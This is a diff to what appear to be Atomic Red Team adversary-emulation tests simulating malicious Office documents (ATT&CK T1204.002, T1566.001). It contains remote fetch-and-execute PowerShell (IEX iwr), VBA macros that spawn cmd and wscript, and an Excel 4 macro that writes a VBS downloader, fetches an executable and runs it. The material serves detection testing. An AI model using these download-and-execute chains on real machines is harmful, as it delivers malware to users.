+Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
```
@@ -127,7 +128,6 @@ Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-at
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| ms_product | Maldoc application Word or Excel | String | Word|
-| ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office". Default latest version. | String | ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office -Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_}) | Sort-Object -desc)[0]|
#### Attack Commands: Run with `powershell`!
@@ -135,30 +135,27 @@ Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-at
```powershell
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
-$ms_office_version = #{ms_office_version}
$macrocode = " a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)"
-Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
+Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
```
-#### Cleanup Commands:
-```powershell
-$ms_office_version = #{ms_office_version}
-Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
-```
#### Dependencies: Run with `powershell`!
-##### Description: Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys
+##### Description: Microsoft #{ms_product} must be installed
##### Check Prereq Commands:
```powershell
-$ms_office_version = #{ms_office_version}
-If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
+try {
+ New-Object -COMObject "#{ms_product}.Application" | Out-Null
+ $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
+ Stop-Process -Name $process
+ exit 0
+} catch { exit 1 }
```
##### Get Prereq Commands:
```powershell
-$msword = New-Object -ComObject word.application
-Stop-Process -Name WINWORD
+Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
```
@@ -181,7 +178,6 @@ Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-at
|------|-------------|------|---------------|
| jse_path | jse file to execute with wscript | Path | C:\Users\Public\art.jse|
| ms_product | Maldoc application Word or Excel | String | Word|
-| ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office". Default latest version. | String | ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office -Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_}) | Sort-Object -desc)|
#### Attack Commands: Run with `powershell`!
@@ -189,31 +185,27 @@ Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-at
```powershell
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
-$ms_office_version = #{ms_office_version}
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n"
-Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
+Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
```
-#### Cleanup Commands:
-```powershell
-$ms_office_version = #{ms_office_version}
-if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
-Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
-```
#### Dependencies: Run with `powershell`!
-##### Description: Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys
+##### Description: Microsoft #{ms_product} must be installed
##### Check Prereq Commands:
```powershell
-$ms_office_version = #{ms_office_version}
-If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
+try {
+ New-Object -COMObject "#{ms_product}.Application" | Out-Null
+ $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
+ Stop-Process -Name $process
+ exit 0
+} catch { exit 1 }
```
##### Get Prereq Commands:
```powershell
-$msword = New-Object -ComObject word.application
-Stop-Process -Name WINWORD
+Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
```
@@ -233,8 +225,7 @@ Microsoft Office creating then launching a .bat script from an AppData directory
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
-| bat_path | Path to malicious .bat file | String | $env:temp+"\art1204.bat"|
-| ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office". Default latest version. | string | ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office -Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_}) | Sort-Object -desc)[0]|
+| bat_path | Path to malicious .bat file | String | $("$env:temp\art1204.bat")|
| ms_product | Maldoc application Word or Excel | String | Word|
@@ -243,32 +234,135 @@ Microsoft Office creating then launching a .bat script from an AppData directory
```powershell
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
-$ms_office_version = #{ms_office_version}
-$bat_path = #{bat_path}
-$macrocode = " Open `"$bat_path`" For Output As #1`n Write #1, `"calc.exe`"`n Close #1`n a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n"
-Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
+$macrocode = " Open `"#{bat_path}`" For Output As #1`n Write #1, `"calc.exe`"`n Close #1`n a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n"
+Invoke-MalDoc -macroCode $macrocode -officeProduct #{ms_product}
```
-#### Cleanup Commands:
-```powershell
-$ms_office_version = #{ms_office_version}
-if (Test-Path (#{bat_path})) { Remove-Item (#{bat_path}) }
-Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
-```
#### Dependencies: Run with `powershell`!
-##### Description: Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys
+##### Description: Microsoft #{ms_product} must be installed
##### Check Prereq Commands:
```powershell
-$ms_office_version = #{ms_office_version}
-If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
+try {
+ New-Object -COMObject "#{ms_product}.Application" | Out-Null
+ $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
+ Stop-Process -Name $process
+ exit 0
+} catch { exit 1 }
```
##### Get Prereq Commands:
```powershell
-$msword = New-Object -ComObject word.application
-Stop-Process -Name WINWORD
+Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
+```
+
+
+
+
+
+
+
+## Atomic Test #6 - Excel 4 Macro
+This module creates an Excel 4 Macro (XLM) enabled spreadsheet and executes it. The XLM will first write a "malicious"
+VBS file to %TEMP%, then execute this file. The VBS will download Process Explorer to the same directory (%TEMP%) and exec.
+
+A note regarding this module. By default, this module will pull the current username from the system and places it into the macro. If
+you'd like to utilize the "=GET.WORKSPACE(26)" method, that many maldoc authors use, you will need to ensure that the User Name associated
+with Excel matches that of the local system. This username can be found under Files -> Options -> Username
+
+**Supported Platforms:** Windows
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| download_url | Download URL | String | https://live.sysinternals.com/procexp.exe|
+| uname | Username for pathing | String | $env:Username|
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+$fname = "$env:TEMP\atomic_redteam_x4m_exec.vbs"
+$fname1 = "$env:TEMP\procexp.exe"
+if (Test-Path $fname) {
+ Remove-Item $fname
+ Remove-Item $fname1
+}
+
+$xlApp = New-Object -COMObject "Excel.Application"
+$xlApp.Visible = $True
+$xlApp.DisplayAlerts = $False
+$xlBook = $xlApp.Workbooks.Add()
+$sheet = $xlBook.Excel4MacroSheets.Add()
+
+if ("#{uname}" -ne "") {
+ $sheet.Cells.Item(1,1) = "#{uname}"
+} else {
+ $sheet.Cells.Item(1,1) = "=GET.WORKSPACE(26)"
+}
+
+$sheet.Cells.Item(2,1) = "procexp.exe"
+$sheet.Cells.Item(3,1) = "atomic_redteam_x4m_exec.vbs"
+$sheet.Cells.Item(4,1) = "=IF(ISNUMBER(SEARCH(`"64`",GET.WORKSPACE(1))), GOTO(A5),)"
+$sheet.Cells.Item(5,1) = "=FOPEN(`"C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A3&`"`", 3)"
+$sheet.Cells.Item(6,1) = "=FWRITELN(A5, `"url = `"`"#{download_url}`"`"`")"
+$sheet.Cells.Item(7,1) = "=FWRITELN(A5, `"`")"
+$sheet.Cells.Item(8,1) = "=FWRITELN(A5, `"Set winHttp = CreateObject(`"`"WinHTTP.WinHTTPrequest.5.1`"`")`")"
+$sheet.Cells.Item(9,1) = "=FWRITELN(A5, `"winHttp.Open `"`"GET`"`", url, False`")"
+$sheet.Cells.Item(10,1) = "=FWRITELN(A5, `"winHttp.Send`")"
+$sheet.Cells.Item(11,1) = "=FWRITELN(A5, `"If winHttp.Status = 200 Then`")"
+$sheet.Cells.Item(12,1) = "=FWRITELN(A5, `"Set oStream = CreateObject(`"`"ADODB.Stream`"`")`")"
+$sheet.Cells.Item(13,1) = "=FWRITELN(A5, `"oStream.Open`")"
+$sheet.Cells.Item(14,1) = "=FWRITELN(A5, `"oStream.Type = 1`")"
+$sheet.Cells.Item(15,1) = "=FWRITELN(A5, `"oStream.Write winHttp.responseBody`")"
+$sheet.Cells.Item(16,1) = "=FWRITELN(A5, `"oStream.SaveToFile `"`"C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A2&`"`"`", 2`")"
+$sheet.Cells.Item(17,1) = "=FWRITELN(A5, `"oStream.Close`")"
+$sheet.Cells.Item(18,1) = "=FWRITELN(A5, `"End If`")"
+$sheet.Cells.Item(19,1) = "=FCLOSE(A5)"
+$sheet.Cells.Item(20,1) = "=EXEC(`"explorer.exe C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A3&`"`")"
+$sheet.Cells.Item(21,1) = "=WAIT(NOW()+`"00:00:05`")"
+$sheet.Cells.Item(22,1) = "=EXEC(`"explorer.exe C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A2&`"`")"
+$sheet.Cells.Item(23,1) = "=HALT()"
+$sheet.Cells.Item(1,1).Name = "runme"
+$xlApp.Run("runme")
+$xlApp.Quit()
+
+[System.Runtime.Interopservices.Marshal]::ReleaseComObject($xlBook) | Out-Null
+[System.Runtime.Interopservices.Marshal]::ReleaseComObject($xlApp) | Out-Null
+[System.GC]::Collect()
+[System.GC]::WaitForPendingFinalizers()
+
+Remove-Variable xlBook
+Remove-Variable xlApp
+```
+
+#### Cleanup Commands:
+```powershell
+Stop-Process -Name "procexp*" -ErrorAction Ignore
+Remove-Item "$env:TEMP\atomic_redteam_x4m_exec.vbs" -ErrorAction Ignore
+Remove-Item "$env:TEMP\procexp.exe" -ErrorAction Ignore
+```
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: Microsoft Excel must be installed
+##### Check Prereq Commands:
+```powershell
+try {
+ New-Object -COMObject "Excel.Application" | Out-Null
+ Stop-Process -Name "Excel"
+ exit 0
+} catch { exit 1 }
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host "You will need to install Microsoft Excel manually to meet this requirement"
```
diff --git a/atomics/T1204.002/T1204.002.yaml b/atomics/T1204.002/T1204.002.yaml
index 17ff1517..a967bf64 100644
--- a/atomics/T1204.002/T1204.002.yaml
+++ b/atomics/T1204.002/T1204.002.yaml
@@ -165,7 +165,7 @@ atomic_tests:
Invoke-MalDoc -macroCode $macrocode -officeProduct #{ms_product}
name: powershell
- name: Excel 4 Macro
- auto_generated_guid:
+ auto_generated_guid: 4ea1fc97-8a46-4b4e-ba48-af43d2a98052
description: |
This module creates an Excel 4 Macro (XLM) enabled spreadsheet and executes it. The XLM will first write a "malicious"
VBS file to %TEMP%, then execute this file. The VBS will download Process Explorer to the same directory (%TEMP%) and exec.
diff --git a/atomics/T1566.001/T1566.001.md b/atomics/T1566.001/T1566.001.md
index bffe1cd7..dc142392 100644
--- a/atomics/T1566.001/T1566.001.md
+++ b/atomics/T1566.001/T1566.001.md
@@ -63,7 +63,6 @@ Upon execution, CMD will be lauchned and ping 8.8.8.8
|------|-------------|------|---------------|
| jse_path | Path for the macro to write out the "malicious" .jse file | String | C:\Users\Public\art.jse|
| ms_product | Maldoc application Word or Excel | String | Word|
-| ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office" | String | 16.0|
#### Attack Commands: Run with `powershell`!
@@ -72,27 +71,30 @@ Upon execution, CMD will be lauchned and ping 8.8.8.8
```powershell
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"ping 8.8.8.8`"`n"
-Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}"
+Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
```
#### Cleanup Commands:
```powershell
-if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
-Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
+Remove-Item #{jse_path} -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
-##### Description: Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependent registry keys
+##### Description: Microsoft #{ms_product} must be installed
##### Check Prereq Commands:
```powershell
-If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version}) { exit 0 } else { exit 1 }
+try {
+ New-Object -COMObject "#{ms_product}.Application" | Out-Null
+ $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
+ Stop-Process -Name $process
+ exit 0
+} catch { exit 1 }
```
##### Get Prereq Commands:
```powershell
-$msword = New-Object -ComObject word.application
-Stop-Process -Name WINWORD
+Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
```
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index fdff4730..0003e3ee 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -625,3 +625,5 @@ f38e9eea-e1d7-4ba6-b716-584791963827
60e860b6-8ae6-49db-ad07-5e73edd88f5d
9215ea92-1ded-41b7-9cd6-79f9a78397aa
9a2915b3-3954-4cce-8c76-00fbf4dbd014
+e8209d5f-e42d-45e6-9c2f-633ac4f1eefa
+4ea1fc97-8a46-4b4e-ba48-af43d2a98052